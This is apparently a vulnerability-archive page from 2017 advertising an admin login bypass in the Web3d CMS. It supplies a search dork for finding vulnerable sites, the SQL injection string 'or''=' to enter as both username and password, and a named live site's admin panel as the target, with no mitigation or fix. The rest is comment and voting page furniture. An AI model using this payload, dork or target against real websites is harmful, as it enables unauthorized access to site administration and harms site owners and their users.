Web3d cms Admin page bypass vulnerability

2017.11.13

IRANIAN ETHICAL HACKERS (NL)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"Website builder and design company Web3D"

[+] Exploit Title ; Web3d cms Admin page bypass vulnerability
[+] Date : 2017-11-12
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : https://web3d.co.il/
[+] Dork : intext:"Website builder and design company Web3D"
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Poc :
[!] Username : 'or''='
[!] Password : 'or''='
[+] Target :
[!] http://www.lextran.co.il/admin/index.php
[!] Admin Panel : /admin/index.php

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Web3d cms Admin page bypass vulnerability

Dork: intext:"Website builder and design company Web3D"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.